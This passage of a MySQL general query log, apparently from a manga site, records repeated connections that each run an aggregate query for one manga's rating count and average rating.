manga_id = '219' order by created desc 330650230 Quit 330650231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330650231 Quit 330650232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330650232 Quit 330650233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330650233 Quit 330650234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330650234 Quit 330650235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330650235 Quit 330650236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330650236 Quit 330650237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330650237 Quit 330650238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330650238 Quit 330650239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330650239 Quit 330650240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330650240 Quit 330650241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330650241 Quit 330650242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330650242 Quit 330650243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330650243 Quit 330650244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330650244 Quit 330650245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330650245 Quit 330650246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330650246 Quit 330650247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330650247 Quit 330650248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330650248 Quit 330650249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330650249 Quit 330650250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330650250 Quit 330650251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330650251 Quit 330650252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330650252 Quit 330650253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330650253 Quit 330650254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330650254 Quit 330650255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330650255 Quit 330650256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330650256 Quit 330650257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330650257 Quit 330650258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330650258 Quit 330650259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330650259 Quit 330650260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330650260 Quit 330650261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330650261 Quit 330650262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330650262 Quit 330650263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330650263 Quit 330650264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330650264 Quit 330650265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330650265 Quit 330650266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330650266 Quit 330650267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330650267 Quit 330650268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330650268 Quit 330650269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330650269 Quit 330650270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330650270 Quit 330650271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330650271 Quit 330650272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330650272 Quit 330650273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330650273 Quit 330650274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330650274 Quit 330650275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330650275 Quit 330650276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330650276 Quit 330650277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330650277 Quit 330650278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330650278 Quit 330650279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330650279 Quit 330650280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330650280 Quit 330650281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330650281 Quit 330650282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330650282 Quit 330650283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330650283 Quit 330650284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330650284 Quit 330650285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330650285 Quit 330650286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330650286 Quit 330650287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330650287 Quit 330650288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330650288 Quit 330650289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330650289 Quit 330650290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330650290 Quit 330650291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330650291 Quit 330650292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330650292 Quit 330650293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330650293 Quit 330650294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330650294 Quit 330650295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330650295 Quit 330650296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330650296 Quit 330650297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330650297 Quit 330650298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330650298 Quit 330650299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330650299 Quit 330650300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330650300 Quit 330650301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330650301 Quit 330650302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330650302 Quit 330650303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330650303 Quit 330650304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330650304 Quit 330650305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330650305 Quit 330650306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330650306 Quit 330650307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330650307 Quit 330650308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330650308 Quit 330650309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330650309 Quit 330650310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330650310 Quit 330650311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330650311 Quit 330650312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330650312 Quit 330650313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330650313 Quit 330650314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330650314 Quit 330650315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330650315 Quit 330650316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330650316 Quit 330650317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330650317 Quit 330650318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330650318 Quit 330650319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330650319 Quit 330650320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330650320 Quit 330650321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330650321 Quit 330650322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330650322 Quit 330650323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330650323 Quit 330650324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330650324 Quit 330650325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330650325 Quit 330650326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330650326 Quit 330650327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330650327 Quit 330650328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330650328 Quit 330650329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330650329 Quit 330650330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330650330 Quit 330650331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330650331 Quit 330650332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330650332 Quit 330650333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330650333 Quit 330650334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330650334 Quit 330650335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330650335 Quit 330650336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330650336 Quit 330650337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330650337 Quit 330650338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330650338 Quit 330650339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330650339 Quit 330650340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330650340 Quit 330650341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330650341 Quit 330650342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330650342 Quit 330650343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330650343 Quit 330650344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330650344 Quit 330650345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330650345 Quit 330650346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330650346 Quit 330650347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330650347 Quit 330650348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330650348 Quit 330650349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330650349 Quit 330650350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330650350 Quit 330650351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330650351 Quit 330650352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330650352 Quit 330650353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330650353 Quit 330650354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330650354 Quit 330650355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330650355 Quit 330650356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330650356 Quit 330650357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330650357 Quit 330650358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330650358 Quit 330650359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330650359 Quit 330650360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330650360 Quit 330650361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330650361 Quit 330650362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330650362 Quit 330650363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330650363 Quit 330650364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330650364 Quit 330650365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330650365 Quit 330650366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330650366 Quit 330650367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330650367 Quit 330650368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330650368 Quit 330650369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330650369 Quit 330650370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330650370 Quit 330650371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330650371 Quit 330650372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330650372 Quit 330650373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330650373 Quit 330650374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330650374 Quit 330650375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330650375 Quit 330650376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330650376 Quit 330650377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330650377 Quit 330650378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330650378 Quit 330650379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330650379 Quit 330650380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330650380 Quit 330650381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330650381 Quit 330650382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330650382 Quit 330650383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = 